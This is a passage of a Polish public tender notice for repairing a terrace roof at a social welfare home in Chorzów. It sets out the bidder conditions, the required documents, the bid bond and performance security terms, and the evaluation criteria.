<br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tegowarunku. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia (wg wzoruzałącznika nr 1 do SIWZ). </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca musi wykazać, iż w okresie ostatnich 5 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał prace wzakresie realizacji robót odpowiadających przedmiotowi zamówienia, w szczególności, że wykonał 2roboty dekarskie o wartości minimum 30.000,00 zł brutto każda. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp (w przypadku wykonawców wspólnieubiegających się o udzielenie zamówienia składa każdy z Wykonawców); 2. W terminie 3 dni odzamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp,przekazania oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupykapitałowej o której mowa w art. 22 ust. 1 pkt 23 ustawy Pzp zgodnie ze wzorem stanowiącymzałącznik nr 3 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzieleniezamówienia składa każdy z Wykonawców). Wraz ze złożeniem oświadczenia, Wykonawca możezłożyć dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadządo zakłócenia konkurencji w postępowaniu</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływemterminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniemdowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególnościinformacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowoukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawioneprzez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionejprzyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - innedokumenty; 2. Dokument(-y), np. zobowiązanie podmiotów (jeżeli dotyczy), na zasobach którychWykonawca będzie polegał w trybie art. 22a ustawy Pzp, do oddania mu do dyspozycji niezbędnychzasobów na potrzeby realizacji zamówienia, z treści których musi wynikać w szczególności: a) zakresdostępnych Wykonawcy zasobów innego podmiotu, b) sposób wykorzystania zasobów innegopodmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego, c) zakres i okres udziałuinnego podmiotu przy wykonywaniu zamówienia publicznego, d) czy podmiot, na zdolnościachktórego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, którychwskazane zdolności dotyczą. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wypełniony Formularz Ofertowy . Uwaga: w przypadku wykonawców wspólnie ubiegających się oudzielenie zamówienia oferta musi być podpisana w taki sposób, by prawnie zobowiązywaławszystkich Wykonawców występujących wspólnie (podpisana przez każdego z wykonawców lubpełnomocnika). 2. Kosztorys ofertowy wykonany na podstawie załączonego przedmiaru i specyfikacjitechnicznej wykonania i odbioru robót ( załączniki 7 i 8 do SIWZ). Do kosztorysu uproszczonegonależy załączyć zbiorcze zestawienie robocizny, materiałów i sprzętu wraz z cenami. 3.Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź doreprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formieoryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się ozamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza. 4. Wykonawcamoże powierzyć wykonanie części zamówienia podwykonawcom. W takim przypadku zamawiającyżąda wskazania przez wykonawcę części zamówienia, których wykonanie zamierza powierzyćpodwykonawcom i podania przez wykonawcę firm podwykonawców (Formularz oferty). Wprzypadku braku informacji zamawiający uzna, że wykonawca zamierza wykonać zamówieniesamodzielnie. Wykonawca, który zamierza powierzyć wykonanie części zamówieniapodwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia zamieszczainformacje o podwykonawcach w oświadczeniu, o którym mowa w pkt. III.3). 5. Wykaz informacjistanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993roku o zwalczaniu nieuczciwej konkurencji, które wykonawca pragnie zastrzec przed dostępem dlainnych uczestników postępowania z podaniem podstawy prawnej. Wykonawca winien wykazać, iżzastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. 6. Dowód wpłacenia wadium zaleca siędołączyć do oferty.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Składając ofertę każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 1.500,00 zł. 2.Wadium może być wnoszone w jednej lub kilku następujących formach : - pieniądzu, - poręczeniachbankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczeniekasy jest zawsze poręczeniem pieniężnym, - gwarancjach bankowych, - gwarancjachubezpieczeniowych, - poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.Nr 109, poz. 1158, z późn. zm.). Oferta nie zabezpieczona wadium zostanie odrzucona bezrozpatrywania. 3. Wadium wnoszone w formie pieniężnej należy wpłacać przelewem na rachunekbankowy Zamawiającego: ING Bank Śląski Katowice 75 1050 1214 1000 0010 0000 3671. zdopiskiem Wadium - Remont dachu tarasu w Domu Pomocy Społecznej Republika przy ul.Michałkowickiej 4 w Chorzowie. Do oferty zaleca się dołączyć kserokopię dowodu wniesieniawadium. 4. Wadium musi być wniesione przed terminem składania ofert. 5. W przypadku wnoszeniawadium w formie pieniężnej za termin jego wniesienia zostanie przyjęty termin uznania rachunkuZamawiającego. 6. Wadium wnoszone w innej formie niż pieniądz należy zdeponować w UrzędzieMiasta Chorzów w Biurze Zamówień Publicznych pok. 419A w formie oryginału dokumentu przedupływem terminu określonego w pkt. 4. 7. Zamawiający dokonuje zwrotu wadium niezwłocznie, gdyzaistnieje jedna z następujących okoliczności ( art.46 ustawy): a) niezwłocznie po wyborze ofertynajkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostaławybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy pzp, b) zawarto umowę wsprawie zamówienia i wniesiono zabezpieczenie należytego wykonania tej umowy; c) na wniosekwykonawcy, który wycofał ofertę przed upływem terminu składania ofert.. 8. Zamawiający będzieżądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art.46 ust 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jakonajkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego. 9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, októrym mowa w art. 26 ust. 3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeńlub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, októrym mowa w art. 25a ust. 1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o którejmowa w art. 87 ust. 2 pkt 3 ustawy pzp, co spowodowało brak możliwości wybrania oferty złożonejprzez wykonawcę jako najkorzystniejszej. 10. Zamawiający zatrzymuje wadium wraz z odsetkami,jeżeli wykonawca, którego oferta została wybrana: a) odmówił podpisania umowy w sprawiezamówienia publicznego na warunkach określonych w ofercie, b) nie wniósł wymaganegozabezpieczenia należytego wykonania umowy, c) zawarcie umowy w sprawie zamówieniapublicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Wzór umowy stanowi załącznik nr 6 do SIWZ</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1. Przed terminem zawarcia umowy zamawiający żąda wniesienia zabezpieczenia należytegowykonania umowy . Zabezpieczenie należy wnieść w wysokości około 10% ceny ofertowej bruttowyrażonej w PLN, albo maksymalnej wartości nominalnej zobowiązania zamawiającegowynikającego z umowy. 2. Zabezpieczenie może być wniesione według wyboru wykonawcy w jednejlub kilku następujących formach: o pieniądzu, o poręczeniach bankowych lub poręczeniachspółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawszezobowiązaniem pieniężnym, o gwarancjach bankowych, o gwarancjach ubezpieczeniowych, oporęczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dn.9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, o za zgodą zamawiającegorównież w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo -kredytowej, oraz przez ustanowienie zastawu na papierach wartościowych emitowanych przez SkarbPaństwa lub jednostkę samorządu terytorialnego, przez ustanowienie zastawu rejestrowego, nazasadach określonych w przepisach o zastawie rejestrowym i rejestrze zastawów. 3. Zabezpieczeniewniesione w formie niepieniężnej winno zawierać zobowiązanie gwaranta do bezwarunkowej inieodwołalnej zapłaty zobowiązania , na pierwsze żądanie zamawiającego zawierające oświadczenie,że wykonawca nie uregulował swoich zobowiązań wynikających z zawartej umowy. Końcowa dataobowiązywania gwarancji powinna być przedłużona o czas potrzebny na realizację zapłaty zazobowiązania wynikające z umowy. Zabezpieczenie wnoszone w pieniądzu wykonawca wpłacaprzelewem na rachunek bankowy zamawiającego ING Bank Śląski Katowice nr konta: 90 1050 12141000 0010 0310 0029 4. Zabezpieczenie w wysokości 70% kwoty, o której mowa w ust.1 będziezwracane 30 dni po podpisaniu protokołu odbioru końcowego, stwierdzającego należyte wykonanieumowy. 5. Zamawiający zatrzyma zabezpieczenie na czas rękojmi za wady, w wysokości 30% kwotyzabezpieczenia. 6. Zabezpieczenie o którym mowa w ust.5, będzie zwracane nie później niż w 15 dniupo upływie okresu rękojmi za wady</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie którejdokonano wyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących o których mowa wart. 144 ust. 1 pkt 2-6 ustawy Pzp : 1) zmiany zostały przewidziane w ogłoszeniu o zamówieniu lubspecyfikacji istotnych warunków zamówienia w postaci jednoznacznych postanowień umownych, któreokreślają ich zakres, w szczególności możliwość zmiany wysokości wynagrodzenia wykonawcy, icharakter oraz warunki wprowadzenia zmian; 2) zmiany dotyczą realizacji dodatkowych robótbudowlanych od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały sięniezbędne i zostały spełnione łącznie następujące warunki: a) zmiana wykonawcy nie może zostaćdokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lubinteroperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego, b)zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dlazamawiającego, c) wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonejpierwotnie w umowie; 3) zostały spełnione łącznie następujące warunki: a) konieczność zmiany umowylub umowy ramowej spowodowana jest okolicznościami, których zamawiający, działając z należytąstarannością, nie mógł przewidzieć, b) wartość zmiany nie przekracza 50% wartości zamówieniaokreślonej pierwotnie w umowie; 4) 